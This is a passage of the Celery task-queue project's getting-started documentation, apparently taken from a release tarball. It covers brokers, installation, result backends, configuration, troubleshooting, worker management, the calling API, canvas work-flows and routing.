_celerytut-broker: Choosing a Broker ================= Celery requires a solution to send and receive messages; usually this comes in the form of a separate service called a *message broker*. There are several choices available, including: RabbitMQ -------- `RabbitMQ`_ is feature-complete, stable, durable and easy to install. It's an excellent choice for a production environment. Detailed information about using RabbitMQ with Celery: :ref:`broker-rabbitmq` .. _`RabbitMQ`: http://www.rabbitmq.com/ If you're using Ubuntu or Debian install RabbitMQ by executing this command: .. code-block:: console $ sudo apt-get install rabbitmq-server Or, if you want to run it on Docker execute this: .. code-block:: console $ docker run -d -p 5672:5672 rabbitmq When the command completes, the broker will already be running in the background, ready to move messages for you: ``Starting rabbitmq-server: SUCCESS``. Don't worry if you're not running Ubuntu or Debian, you can go to this website to find similarly simple installation instructions for other platforms, including Microsoft Windows: http://www.rabbitmq.com/download.html Redis ----- `Redis`_ is also feature-complete, but is more susceptible to data loss in the event of abrupt termination or power failures. Detailed information about using Redis: :ref:`broker-redis` .. _`Redis`: https://redis.io/ If you want to run it on Docker execute this: .. code-block:: console $ docker run -d -p 6379:6379 redis Other brokers ------------- In addition to the above, there are other experimental transport implementations to choose from, including :ref:`Amazon SQS `. See :ref:`broker-overview` for a full list. .. _celerytut-installation: Installing Celery ================= Celery is on the Python Package Index (PyPI), so it can be installed with standard Python tools like ``pip`` or ``easy_install``: .. code-block:: console $ pip install celery Application =========== The first thing you need is a Celery instance. We call this the *Celery application* or just *app* for short. As this instance is used as the entry-point for everything you want to do in Celery, like creating tasks and managing workers, it must be possible for other modules to import it. In this tutorial we keep everything contained in a single module, but for larger projects you want to create a :ref:`dedicated module `. Let's create the file :file:`tasks.py`: .. code-block:: python from celery import Celery app = Celery('tasks', broker='pyamqp://guest@localhost//') @app.task def add(x, y): return x + y The first argument to :class:`~celery.app.Celery` is the name of the current module. This is only needed so that names can be automatically generated when the tasks are defined in the `__main__` module. The second argument is the broker keyword argument, specifying the URL of the message broker you want to use. Here we are using RabbitMQ (also the default option). See :ref:`celerytut-broker` above for more choices -- for RabbitMQ you can use ``amqp://localhost``, or for Redis you can use ``redis://localhost``. You defined a single task, called ``add``, returning the sum of two numbers. .. _celerytut-running-the-worker: Running the Celery worker server ================================ You can now run the worker by executing our program with the ``worker`` argument: .. code-block:: console $ celery -A tasks worker --loglevel=INFO .. note:: See the :ref:`celerytut-troubleshooting` section if the worker doesn't start. In production you'll want to run the worker in the background as a daemon. 
To do this you need to use the tools provided by your platform, or something like `supervisord`_ (see :ref:`daemonizing` for more information). For a complete listing of the command-line options available, do: .. code-block:: console $ celery worker --help There are also several other commands available, and help is also available: .. code-block:: console $ celery --help .. _`supervisord`: http://supervisord.org .. _celerytut-calling: Calling the task ================ To call our task you can use the :meth:`~@Task.delay` method. This is a handy shortcut to the :meth:`~@Task.apply_async` method that gives greater control of the task execution (see :ref:`guide-calling`):: >>> from tasks import add >>> add.delay(4, 4) The task has now been processed by the worker you started earlier. You can verify this by looking at the worker's console output. Calling a task returns an :class:`~@AsyncResult` instance. This can be used to check the state of the task, wait for the task to finish, or get its return value (or if the task failed, to get the exception and traceback). Results are not enabled by default. In order to do remote procedure calls or keep track of task results in a database, you will need to configure Celery to use a result backend. This is described in the next section. .. _celerytut-keeping-results: Keeping Results =============== If you want to keep track of the tasks' states, Celery needs to store or send the states somewhere. There are several built-in result backends to choose from: `SQLAlchemy`_/`Django`_ ORM, `MongoDB`_, `Memcached`_, `Redis`_, :ref:`RPC ` (`RabbitMQ`_/AMQP), and -- or you can define your own. .. _`Memcached`: http://memcached.org .. _`MongoDB`: http://www.mongodb.org .. _`SQLAlchemy`: http://www.sqlalchemy.org/ .. _`Django`: http://djangoproject.com For this example we use the `rpc` result backend, that sends states back as transient messages. The backend is specified via the ``backend`` argument to :class:`@Celery`, (or via the :setting:`result_backend` setting if you choose to use a configuration module). So, you can modify this line in the `tasks.py` file to enable the `rpc://` backend: .. code-block:: python app = Celery('tasks', backend='rpc://', broker='pyamqp://') Or if you want to use Redis as the result backend, but still use RabbitMQ as the message broker (a popular combination): .. code-block:: python app = Celery('tasks', backend='redis://localhost', broker='pyamqp://') To read more about result backends please see :ref:`task-result-backends`. Now with the result backend configured, close the current python session and import the ``tasks`` module again to put the changes into effect. This time you'll hold on to the :class:`~@AsyncResult` instance returned when you call a task: .. code-block:: pycon >>> from tasks import add # close and reopen to get updated 'app' >>> result = add.delay(4, 4) The :meth:`~@AsyncResult.ready` method returns whether the task has finished processing or not: .. code-block:: pycon >>> result.ready() False You can wait for the result to complete, but this is rarely used since it turns the asynchronous call into a synchronous one: .. code-block:: pycon >>> result.get(timeout=1) 8 In case the task raised an exception, :meth:`~@AsyncResult.get` will re-raise the exception, but you can override this by specifying the ``propagate`` argument: .. code-block:: pycon >>> result.get(propagate=False) If the task raised an exception, you can also gain access to the original traceback: .. code-block:: pycon >>> result.traceback .. 
warning:: Backends use resources to store and transmit results. To ensure that resources are released, you must eventually call :meth:`~@AsyncResult.get` or :meth:`~@AsyncResult.forget` on EVERY :class:`~@AsyncResult` instance returned after calling a task. See :mod:`celery.result` for the complete result object reference. .. _celerytut-configuration: Configuration ============= Celery, like a consumer appliance, doesn't need much configuration to operate. It has an input and an output. The input must be connected to a broker, and the output can be optionally connected to a result backend. However, if you look closely at the back, there's a lid revealing loads of sliders, dials, and buttons: this is the configuration. The default configuration should be good enough for most use cases, but there are many options that can be configured to make Celery work exactly as needed. Reading about the options available is a good idea to familiarize yourself with what can be configured. You can read about the options in the :ref:`configuration` reference. The configuration can be set on the app directly or by using a dedicated configuration module. As an example you can configure the default serializer used for serializing task payloads by changing the :setting:`task_serializer` setting: .. code-block:: python app.conf.task_serializer = 'json' If you're configuring many settings at once you can use ``update``: .. code-block:: python app.conf.update( task_serializer='json', accept_content=['json'], # Ignore other content result_serializer='json', timezone='Europe/Oslo', enable_utc=True, ) For larger projects, a dedicated configuration module is recommended. Hard coding periodic task intervals and task routing options is discouraged. It is much better to keep these in a centralized location. This is especially true for libraries, as it enables users to control how their tasks behave. A centralized configuration will also allow your SysAdmin to make simple changes in the event of system trouble. You can tell your Celery instance to use a configuration module by calling the :meth:`@config_from_object` method: .. code-block:: python app.config_from_object('celeryconfig') This module is often called "``celeryconfig``", but you can use any module name. In the above case, a module named ``celeryconfig.py`` must be available to load from the current directory or on the Python path. It could look something like this: :file:`celeryconfig.py`: .. code-block:: python broker_url = 'pyamqp://' result_backend = 'rpc://' task_serializer = 'json' result_serializer = 'json' accept_content = ['json'] timezone = 'Europe/Oslo' enable_utc = True To verify that your configuration file works properly and doesn't contain any syntax errors, you can try to import it: .. code-block:: console $ python -m celeryconfig For a complete reference of configuration options, see :ref:`configuration`. To demonstrate the power of configuration files, this is how you'd route a misbehaving task to a dedicated queue: :file:`celeryconfig.py`: .. code-block:: python task_routes = { 'tasks.add': 'low-priority', } Or instead of routing it you could rate limit the task instead, so that only 10 tasks of this type can be processed in a minute (10/m): :file:`celeryconfig.py`: .. code-block:: python task_annotations = { 'tasks.add': {'rate_limit': '10/m'} } If you're using RabbitMQ or Redis as the broker then you can also direct the workers to set a new rate limit for the task at runtime: .. 
code-block:: console $ celery -A tasks control rate_limit tasks.add 10/m worker@example.com: OK new rate limit set successfully See :ref:`guide-routing` to read more about task routing, and the :setting:`task_annotations` setting for more about annotations, or :ref:`guide-monitoring` for more about remote control commands and how to monitor what your workers are doing. Where to go from here ===================== If you want to learn more you should continue to the :ref:`Next Steps ` tutorial, and after that you can read the :ref:`User Guide `. .. _celerytut-troubleshooting: Troubleshooting =============== There's also a troubleshooting section in the :ref:`faq`. Worker doesn't start: Permission Error -------------------------------------- - If you're using Debian, Ubuntu or other Debian-based distributions: Debian recently renamed the :file:`/dev/shm` special file to :file:`/run/shm`. A simple workaround is to create a symbolic link: .. code-block:: console # ln -s /run/shm /dev/shm - Others: If you provide any of the :option:`--pidfile `, :option:`--logfile ` or :option:`--statedb ` arguments, then you must make sure that they point to a file or directory that's writable and readable by the user starting the worker. Result backend doesn't work or tasks are always in ``PENDING`` state -------------------------------------------------------------------- All tasks are :state:`PENDING` by default, so the state would've been better named "unknown". Celery doesn't update the state when a task is sent, and any task with no history is assumed to be pending (you know the task id, after all). 1) Make sure that the task doesn't have ``ignore_result`` enabled. Enabling this option will force the worker to skip updating states. 2) Make sure the :setting:`task_ignore_result` setting isn't enabled. 3) Make sure that you don't have any old workers still running. It's easy to start multiple workers by accident, so make sure that the previous worker is properly shut down before you start a new one. An old worker that isn't configured with the expected result backend may be running and is hijacking the tasks. The :option:`--pidfile ` argument can be set to an absolute path to make sure this doesn't happen. 4) Make sure the client is configured with the right backend. If, for some reason, the client is configured to use a different backend than the worker, you won't be able to receive the result. Make sure the backend is configured correctly: .. code-block:: pycon >>> result = task.delay() >>> print(result.backend) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/getting-started/index.rst0000664000175000017500000000034200000000000020572 0ustar00asifasif00000000000000================= Getting Started ================= :Release: |version| :Date: |today| .. toctree:: :maxdepth: 2 introduction backends-and-brokers/index first-steps-with-celery next-steps resources ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/docs/getting-started/introduction.rst0000664000175000017500000002522700000000000022215 0ustar00asifasif00000000000000.. _intro: ======================== Introduction to Celery ======================== .. contents:: :local: :depth: 1 What's a Task Queue? ==================== Task queues are used as a mechanism to distribute work across threads or machines. A task queue's input is a unit of work called a task. 
Dedicated worker processes constantly monitor task queues for new work to perform. Celery communicates via messages, usually using a broker to mediate between clients and workers. To initiate a task the client adds a message to the queue, the broker then delivers that message to a worker. A Celery system can consist of multiple workers and brokers, giving way to high availability and horizontal scaling. Celery is written in Python, but the protocol can be implemented in any language. In addition to Python there's node-celery_ and node-celery-ts_ for Node.js, and a `PHP client`_. Language interoperability can also be achieved exposing an HTTP endpoint and having a task that requests it (webhooks). .. _`PHP client`: https://github.com/gjedeer/celery-php .. _node-celery: https://github.com/mher/node-celery .. _node-celery-ts: https://github.com/IBM/node-celery-ts What do I need? =============== .. sidebar:: Version Requirements :subtitle: Celery version 5.2 runs on - Python ❨3.7, 3.8, 3.9, 3.10❩ - PyPy3.7, 3.8 ❨7.3.7❩ Celery 4.x was the last version to support Python 2.7, Celery 5.x requires Python 3.6 or newer. Celery 5.1.x also requires Python 3.6 or newer. Celery 5.2.x requires Python 3.7 or newer. If you're running an older version of Python, you need to be running an older version of Celery: - Python 2.7 or Python 3.5: Celery series 4.4 or earlier. - Python 2.6: Celery series 3.1 or earlier. - Python 2.5: Celery series 3.0 or earlier. - Python 2.4 was Celery series 2.2 or earlier. Celery is a project with minimal funding, so we don't support Microsoft Windows. Please don't open any issues related to that platform. *Celery* requires a message transport to send and receive messages. The RabbitMQ and Redis broker transports are feature complete, but there's also support for a myriad of other experimental solutions, including using SQLite for local development. *Celery* can run on a single machine, on multiple machines, or even across data centers. Get Started =========== If this is the first time you're trying to use Celery, or if you haven't kept up with development in the 3.1 version and are coming from previous versions, then you should read our getting started tutorials: - :ref:`first-steps` - :ref:`next-steps` Celery is… ========== .. _`mailing-list`: https://groups.google.com/group/celery-users .. topic:: \ - **Simple** Celery is easy to use and maintain, and it *doesn't need configuration files*. It has an active, friendly community you can talk to for support, including a `mailing-list`_ and an :ref:`IRC channel `. Here's one of the simplest applications you can make: .. code-block:: python from celery import Celery app = Celery('hello', broker='amqp://guest@localhost//') @app.task def hello(): return 'hello world' - **Highly Available** Workers and clients will automatically retry in the event of connection loss or failure, and some brokers support HA in way of *Primary/Primary* or *Primary/Replica* replication. - **Fast** A single Celery process can process millions of tasks a minute, with sub-millisecond round-trip latency (using RabbitMQ, librabbitmq, and optimized settings). - **Flexible** Almost every part of *Celery* can be extended or used on its own, Custom pool implementations, serializers, compression schemes, logging, schedulers, consumers, producers, broker transports, and much more. .. topic:: It supports .. 
hlist:: :columns: 2 - **Brokers** - :ref:`RabbitMQ `, :ref:`Redis `, - :ref:`Amazon SQS `, and more… - **Concurrency** - prefork (multiprocessing), - Eventlet_, gevent_ - thread (multithreaded) - `solo` (single threaded) - **Result Stores** - AMQP, Redis - Memcached, - SQLAlchemy, Django ORM - Apache Cassandra, Elasticsearch, Riak - MongoDB, CouchDB, Couchbase, ArangoDB - Amazon DynamoDB, Amazon S3 - Microsoft Azure Block Blob, Microsoft Azure Cosmos DB - File system - **Serialization** - *pickle*, *json*, *yaml*, *msgpack*. - *zlib*, *bzip2* compression. - Cryptographic message signing. Features ======== .. topic:: \ .. hlist:: :columns: 2 - **Monitoring** A stream of monitoring events is emitted by workers and is used by built-in and external tools to tell you what your cluster is doing -- in real-time. :ref:`Read more… `. - **Work-flows** Simple and complex work-flows can be composed using a set of powerful primitives we call the "canvas", including grouping, chaining, chunking, and more. :ref:`Read more… `. - **Time & Rate Limits** You can control how many tasks can be executed per second/minute/hour, or how long a task can be allowed to run, and this can be set as a default, for a specific worker or individually for each task type. :ref:`Read more… `. - **Scheduling** You can specify the time to run a task in seconds or a :class:`~datetime.datetime`, or you can use periodic tasks for recurring events based on a simple interval, or Crontab expressions supporting minute, hour, day of week, day of month, and month of year. :ref:`Read more… `. - **Resource Leak Protection** The :option:`--max-tasks-per-child ` option is used for user tasks leaking resources, like memory or file descriptors, that are simply out of your control. :ref:`Read more… `. - **User Components** Each worker component can be customized, and additional components can be defined by the user. The worker is built up using "bootsteps" — a dependency graph enabling fine grained control of the worker's internals. .. _`Eventlet`: http://eventlet.net/ .. _`gevent`: http://gevent.org/ Framework Integration ===================== Celery is easy to integrate with web frameworks, some of them even have integration packages: +--------------------+------------------------+ | `Pyramid`_ | :pypi:`pyramid_celery` | +--------------------+------------------------+ | `Pylons`_ | :pypi:`celery-pylons` | +--------------------+------------------------+ | `Flask`_ | not needed | +--------------------+------------------------+ | `web2py`_ | :pypi:`web2py-celery` | +--------------------+------------------------+ | `Tornado`_ | :pypi:`tornado-celery` | +--------------------+------------------------+ | `Tryton`_ | :pypi:`celery_tryton` | +--------------------+------------------------+ For `Django`_ see :ref:`django-first-steps`. The integration packages aren't strictly necessary, but they can make development easier, and sometimes they add important hooks like closing database connections at :manpage:`fork(2)`. .. _`Django`: https://djangoproject.com/ .. _`Pylons`: http://pylonshq.com/ .. _`Flask`: http://flask.pocoo.org/ .. _`web2py`: http://web2py.com/ .. _`Bottle`: https://bottlepy.org/ .. _`Pyramid`: http://docs.pylonsproject.org/en/latest/docs/pyramid.html .. _`Tornado`: http://www.tornadoweb.org/ .. _`Tryton`: http://www.tryton.org/ .. _`tornado-celery`: https://github.com/mher/tornado-celery/ Quick Jump ========== .. topic:: I want to ⟶ .. 
hlist:: :columns: 2 - :ref:`get the return value of a task ` - :ref:`use logging from my task ` - :ref:`learn about best practices ` - :ref:`create a custom task base class ` - :ref:`add a callback to a group of tasks ` - :ref:`split a task into several chunks ` - :ref:`optimize the worker ` - :ref:`see a list of built-in task states ` - :ref:`create custom task states ` - :ref:`set a custom task name ` - :ref:`track when a task starts ` - :ref:`retry a task when it fails ` - :ref:`get the id of the current task ` - :ref:`know what queue a task was delivered to ` - :ref:`see a list of running workers ` - :ref:`purge all messages ` - :ref:`inspect what the workers are doing ` - :ref:`see what tasks a worker has registered ` - :ref:`migrate tasks to a new broker ` - :ref:`see a list of event message types ` - :ref:`contribute to Celery ` - :ref:`learn about available configuration settings ` - :ref:`get a list of people and companies using Celery ` - :ref:`write my own remote control command ` - :ref:`change worker queues at runtime ` .. topic:: Jump to ⟶ .. hlist:: :columns: 4 - :ref:`Brokers ` - :ref:`Applications ` - :ref:`Tasks ` - :ref:`Calling ` - :ref:`Workers ` - :ref:`Daemonizing ` - :ref:`Monitoring ` - :ref:`Optimizing ` - :ref:`Security ` - :ref:`Routing ` - :ref:`Configuration ` - :ref:`Django ` - :ref:`Contributing ` - :ref:`Signals ` - :ref:`FAQ ` - :ref:`API Reference ` .. include:: ../includes/installation.txt ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/getting-started/next-steps.rst0000664000175000017500000005442200000000000021605 0ustar00asifasif00000000000000.. _next-steps: ============ Next Steps ============ The :ref:`first-steps` guide is intentionally minimal. In this guide I'll demonstrate what Celery offers in more detail, including how to add Celery support for your application and library. This document doesn't document all of Celery's features and best practices, so it's recommended that you also read the :ref:`User Guide ` .. contents:: :local: :depth: 1 Using Celery in your Application ================================ .. _project-layout: Our Project ----------- Project layout:: proj/__init__.py /celery.py /tasks.py :file:`proj/celery.py` ~~~~~~~~~~~~~~~~~~~~~~ .. literalinclude:: ../../examples/next-steps/proj/celery.py :language: python In this module you created our :class:`@Celery` instance (sometimes referred to as the *app*). To use Celery within your project you simply import this instance. - The ``broker`` argument specifies the URL of the broker to use. See :ref:`celerytut-broker` for more information. - The ``backend`` argument specifies the result backend to use. It's used to keep track of task state and results. While results are disabled by default I use the RPC result backend here because I demonstrate how retrieving results work later. You may want to use a different backend for your application. They all have different strengths and weaknesses. If you don't need results, it's better to disable them. Results can also be disabled for individual tasks by setting the ``@task(ignore_result=True)`` option. See :ref:`celerytut-keeping-results` for more information. - The ``include`` argument is a list of modules to import when the worker starts. You need to add our tasks module here so that the worker is able to find our tasks. :file:`proj/tasks.py` ~~~~~~~~~~~~~~~~~~~~~ .. 
literalinclude:: ../../examples/next-steps/proj/tasks.py :language: python Starting the worker ------------------- The :program:`celery` program can be used to start the worker (you need to run the worker in the directory above proj): .. code-block:: console $ celery -A proj worker -l INFO When the worker starts you should see a banner and some messages:: --------------- celery@halcyon.local v4.0 (latentcall) --- ***** ----- -- ******* ---- [Configuration] - *** --- * --- . broker: amqp://guest@localhost:5672// - ** ---------- . app: __main__:0x1012d8590 - ** ---------- . concurrency: 8 (processes) - ** ---------- . events: OFF (enable -E to monitor this worker) - ** ---------- - *** --- * --- [Queues] -- ******* ---- . celery: exchange:celery(direct) binding:celery --- ***** ----- [2012-06-08 16:23:51,078: WARNING/MainProcess] celery@halcyon.local has started. -- The *broker* is the URL you specified in the broker argument in our ``celery`` module. You can also specify a different broker on the command-line by using the :option:`-b ` option. -- *Concurrency* is the number of prefork worker process used to process your tasks concurrently. When all of these are busy doing work, new tasks will have to wait for one of the tasks to finish before it can be processed. The default concurrency number is the number of CPU's on that machine (including cores). You can specify a custom number using the :option:`celery worker -c` option. There's no recommended value, as the optimal number depends on a number of factors, but if your tasks are mostly I/O-bound then you can try to increase it. Experimentation has shown that adding more than twice the number of CPU's is rarely effective, and likely to degrade performance instead. Including the default prefork pool, Celery also supports using Eventlet, Gevent, and running in a single thread (see :ref:`concurrency`). -- *Events* is an option that causes Celery to send monitoring messages (events) for actions occurring in the worker. These can be used by monitor programs like ``celery events``, and Flower -- the real-time Celery monitor, which you can read about in the :ref:`Monitoring and Management guide `. -- *Queues* is the list of queues that the worker will consume tasks from. The worker can be told to consume from several queues at once, and this is used to route messages to specific workers as a means for Quality of Service, separation of concerns, and prioritization, all described in the :ref:`Routing Guide `. You can get a complete list of command-line arguments by passing in the :option:`--help ` flag: .. code-block:: console $ celery worker --help These options are described in more detailed in the :ref:`Workers Guide `. Stopping the worker ~~~~~~~~~~~~~~~~~~~ To stop the worker simply hit :kbd:`Control-c`. A list of signals supported by the worker is detailed in the :ref:`Workers Guide `. In the background ~~~~~~~~~~~~~~~~~ In production you'll want to run the worker in the background, described in detail in the :ref:`daemonization tutorial `. The daemonization scripts uses the :program:`celery multi` command to start one or more workers in the background: .. code-block:: console $ celery multi start w1 -A proj -l INFO celery multi v4.0.0 (latentcall) > Starting nodes... > w1.halcyon.local: OK You can restart it too: .. code-block:: console $ celery multi restart w1 -A proj -l INFO celery multi v4.0.0 (latentcall) > Stopping nodes... > w1.halcyon.local: TERM -> 64024 > Waiting for 1 node..... 
> w1.halcyon.local: OK > Restarting node w1.halcyon.local: OK celery multi v4.0.0 (latentcall) > Stopping nodes... > w1.halcyon.local: TERM -> 64052 or stop it: .. code-block:: console $ celery multi stop w1 -A proj -l INFO The ``stop`` command is asynchronous so it won't wait for the worker to shutdown. You'll probably want to use the ``stopwait`` command instead, which ensures that all currently executing tasks are completed before exiting: .. code-block:: console $ celery multi stopwait w1 -A proj -l INFO .. note:: :program:`celery multi` doesn't store information about workers so you need to use the same command-line arguments when restarting. Only the same pidfile and logfile arguments must be used when stopping. By default it'll create pid and log files in the current directory. To protect against multiple workers launching on top of each other you're encouraged to put these in a dedicated directory: .. code-block:: console $ mkdir -p /var/run/celery $ mkdir -p /var/log/celery $ celery multi start w1 -A proj -l INFO --pidfile=/var/run/celery/%n.pid \ --logfile=/var/log/celery/%n%I.log With the multi command you can start multiple workers, and there's a powerful command-line syntax to specify arguments for different workers too, for example: .. code-block:: console $ celery multi start 10 -A proj -l INFO -Q:1-3 images,video -Q:4,5 data \ -Q default -L:4,5 debug For more examples see the :mod:`~celery.bin.multi` module in the API reference. .. _app-argument: About the :option:`--app ` argument ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The :option:`--app ` argument specifies the Celery app instance to use, in the form of ``module.path:attribute`` But it also supports a shortcut form. If only a package name is specified, it'll try to search for the app instance, in the following order: With :option:`--app=proj `: 1) an attribute named ``proj.app``, or 2) an attribute named ``proj.celery``, or 3) any attribute in the module ``proj`` where the value is a Celery application, or If none of these are found it'll try a submodule named ``proj.celery``: 4) an attribute named ``proj.celery.app``, or 5) an attribute named ``proj.celery.celery``, or 6) Any attribute in the module ``proj.celery`` where the value is a Celery application. This scheme mimics the practices used in the documentation -- that is, ``proj:app`` for a single contained module, and ``proj.celery:app`` for larger projects. .. _calling-tasks: Calling Tasks ============= You can call a task using the :meth:`delay` method: .. code-block:: pycon >>> from proj.tasks import add >>> add.delay(2, 2) This method is actually a star-argument shortcut to another method called :meth:`apply_async`: .. code-block:: pycon >>> add.apply_async((2, 2)) The latter enables you to specify execution options like the time to run (countdown), the queue it should be sent to, and so on: .. code-block:: pycon >>> add.apply_async((2, 2), queue='lopri', countdown=10) In the above example the task will be sent to a queue named ``lopri`` and the task will execute, at the earliest, 10 seconds after the message was sent. Applying the task directly will execute the task in the current process, so that no message is sent: .. code-block:: pycon >>> add(2, 2) 4 These three methods - :meth:`delay`, :meth:`apply_async`, and applying (``__call__``), make up the Celery calling API, which is also used for signatures. A more detailed overview of the Calling API can be found in the :ref:`Calling User Guide `. 
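As a quick recap, here's a short sketch (adapted from the examples above, and assuming the ``add`` task from the example project) showing the three calling styles side by side:

.. code-block:: python

    from proj.tasks import add

    # delay(): star-argument shortcut; sends a message and returns an AsyncResult.
    result = add.delay(2, 2)

    # apply_async(): the same, but also accepts execution options.
    result = add.apply_async((2, 2), queue='lopri', countdown=10)

    # Calling the task directly runs it in the current process; no message is sent.
    assert add(2, 2) == 4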
Every task invocation will be given a unique identifier (an UUID) -- this is the task id. The ``delay`` and ``apply_async`` methods return an :class:`~@AsyncResult` instance, which can be used to keep track of the tasks execution state. But for this you need to enable a :ref:`result backend ` so that the state can be stored somewhere. Results are disabled by default because there is no result backend that suits every application; to choose one you need to consider the drawbacks of each individual backend. For many tasks keeping the return value isn't even very useful, so it's a sensible default to have. Also note that result backends aren't used for monitoring tasks and workers: for that Celery uses dedicated event messages (see :ref:`guide-monitoring`). If you have a result backend configured you can retrieve the return value of a task: .. code-block:: pycon >>> res = add.delay(2, 2) >>> res.get(timeout=1) 4 You can find the task's id by looking at the :attr:`id` attribute: .. code-block:: pycon >>> res.id d6b3aea2-fb9b-4ebc-8da4-848818db9114 You can also inspect the exception and traceback if the task raised an exception, in fact ``result.get()`` will propagate any errors by default: .. code-block:: pycon >>> res = add.delay(2, '2') >>> res.get(timeout=1) .. code-block:: pytb Traceback (most recent call last): File "", line 1, in File "celery/result.py", line 221, in get return self.backend.wait_for_pending( File "celery/backends/asynchronous.py", line 195, in wait_for_pending return result.maybe_throw(callback=callback, propagate=propagate) File "celery/result.py", line 333, in maybe_throw self.throw(value, self._to_remote_traceback(tb)) File "celery/result.py", line 326, in throw self.on_ready.throw(*args, **kwargs) File "vine/promises.py", line 244, in throw reraise(type(exc), exc, tb) File "vine/five.py", line 195, in reraise raise value TypeError: unsupported operand type(s) for +: 'int' and 'str' If you don't wish for the errors to propagate, you can disable that by passing ``propagate``: .. code-block:: pycon >>> res.get(propagate=False) TypeError("unsupported operand type(s) for +: 'int' and 'str'") In this case it'll return the exception instance raised instead -- so to check whether the task succeeded or failed, you'll have to use the corresponding methods on the result instance: .. code-block:: pycon >>> res.failed() True >>> res.successful() False So how does it know if the task has failed or not? It can find out by looking at the tasks *state*: .. code-block:: pycon >>> res.state 'FAILURE' A task can only be in a single state, but it can progress through several states. The stages of a typical task can be:: PENDING -> STARTED -> SUCCESS The started state is a special state that's only recorded if the :setting:`task_track_started` setting is enabled, or if the ``@task(track_started=True)`` option is set for the task. The pending state is actually not a recorded state, but rather the default state for any task id that's unknown: this you can see from this example: .. code-block:: pycon >>> from proj.celery import app >>> res = app.AsyncResult('this-id-does-not-exist') >>> res.state 'PENDING' If the task is retried the stages can become even more complex. To demonstrate, for a task that's retried two times the stages would be: .. code-block:: text PENDING -> STARTED -> RETRY -> STARTED -> RETRY -> STARTED -> SUCCESS To read more about task states you should see the :ref:`task-states` section in the tasks user guide. 
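For example, here's a small sketch (not part of the tutorial project, and assuming a result backend is configured as shown earlier) of reacting to the terminal state of a task:

.. code-block:: python

    from proj.tasks import add

    res = add.delay(2, 2)
    res.get(timeout=10, propagate=False)    # wait for a terminal state

    if res.successful():
        print('result:', res.result)
    elif res.failed():
        print('failed with:', res.result)   # the exception instance
    print('final state:', res.state)        # e.g. 'SUCCESS' or 'FAILURE'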
Calling tasks is described in detail in the :ref:`Calling Guide `. .. _designing-workflows: *Canvas*: Designing Work-flows ============================== You just learned how to call a task using the tasks ``delay`` method, and this is often all you need. But sometimes you may want to pass the signature of a task invocation to another process or as an argument to another function, for which Celery uses something called *signatures*. A signature wraps the arguments and execution options of a single task invocation in such a way that it can be passed to functions or even serialized and sent across the wire. You can create a signature for the ``add`` task using the arguments ``(2, 2)``, and a countdown of 10 seconds like this: .. code-block:: pycon >>> add.signature((2, 2), countdown=10) tasks.add(2, 2) There's also a shortcut using star arguments: .. code-block:: pycon >>> add.s(2, 2) tasks.add(2, 2) And there's that calling API again… ----------------------------------- Signature instances also support the calling API, meaning they have ``delay`` and ``apply_async`` methods. But there's a difference in that the signature may already have an argument signature specified. The ``add`` task takes two arguments, so a signature specifying two arguments would make a complete signature: .. code-block:: pycon >>> s1 = add.s(2, 2) >>> res = s1.delay() >>> res.get() 4 But, you can also make incomplete signatures to create what we call *partials*: .. code-block:: pycon # incomplete partial: add(?, 2) >>> s2 = add.s(2) ``s2`` is now a partial signature that needs another argument to be complete, and this can be resolved when calling the signature: .. code-block:: pycon # resolves the partial: add(8, 2) >>> res = s2.delay(8) >>> res.get() 10 Here you added the argument 8 that was prepended to the existing argument 2 forming a complete signature of ``add(8, 2)``. Keyword arguments can also be added later; these are then merged with any existing keyword arguments, but with new arguments taking precedence: .. code-block:: pycon >>> s3 = add.s(2, 2, debug=True) >>> s3.delay(debug=False) # debug is now False. As stated, signatures support the calling API: meaning that - ``sig.apply_async(args=(), kwargs={}, **options)`` Calls the signature with optional partial arguments and partial keyword arguments. Also supports partial execution options. - ``sig.delay(*args, **kwargs)`` Star argument version of ``apply_async``. Any arguments will be prepended to the arguments in the signature, and keyword arguments is merged with any existing keys. So this all seems very useful, but what can you actually do with these? To get to that I must introduce the canvas primitives… The Primitives -------------- .. topic:: \ .. hlist:: :columns: 2 - :ref:`group ` - :ref:`chain ` - :ref:`chord ` - :ref:`map ` - :ref:`starmap ` - :ref:`chunks ` These primitives are signature objects themselves, so they can be combined in any number of ways to compose complex work-flows. .. note:: These examples retrieve results, so to try them out you need to configure a result backend. The example project above already does that (see the backend argument to :class:`~celery.Celery`). Let's look at some examples: Groups ~~~~~~ A :class:`~celery.group` calls a list of tasks in parallel, and it returns a special result instance that lets you inspect the results as a group, and retrieve the return values in order. .. 
code-block:: pycon >>> from celery import group >>> from proj.tasks import add >>> group(add.s(i, i) for i in range(10))().get() [0, 2, 4, 6, 8, 10, 12, 14, 16, 18] - Partial group .. code-block:: pycon >>> g = group(add.s(i) for i in range(10)) >>> g(10).get() [10, 11, 12, 13, 14, 15, 16, 17, 18, 19] Chains ~~~~~~ Tasks can be linked together so that after one task returns the other is called: .. code-block:: pycon >>> from celery import chain >>> from proj.tasks import add, mul # (4 + 4) * 8 >>> chain(add.s(4, 4) | mul.s(8))().get() 64 or a partial chain: .. code-block:: pycon >>> # (? + 4) * 8 >>> g = chain(add.s(4) | mul.s(8)) >>> g(4).get() 64 Chains can also be written like this: .. code-block:: pycon >>> (add.s(4, 4) | mul.s(8))().get() 64 Chords ~~~~~~ A chord is a group with a callback: .. code-block:: pycon >>> from celery import chord >>> from proj.tasks import add, xsum >>> chord((add.s(i, i) for i in range(10)), xsum.s())().get() 90 A group chained to another task will be automatically converted to a chord: .. code-block:: pycon >>> (group(add.s(i, i) for i in range(10)) | xsum.s())().get() 90 Since these primitives are all of the signature type they can be combined almost however you want, for example: .. code-block:: pycon >>> upload_document.s(file) | group(apply_filter.s() for filter in filters) Be sure to read more about work-flows in the :ref:`Canvas ` user guide. Routing ======= Celery supports all of the routing facilities provided by AMQP, but it also supports simple routing where messages are sent to named queues. The :setting:`task_routes` setting enables you to route tasks by name and keep everything centralized in one location: .. code-block:: python app.conf.update( task_routes = { 'proj.tasks.add': {'queue': 'hipri'}, }, ) You can also specify the queue at runtime with the ``queue`` argument to ``apply_async``: .. code-block:: pycon >>> from proj.tasks import add >>> add.apply_async((2, 2), queue='hipri') You can then make a worker consume from this queue by specifying the 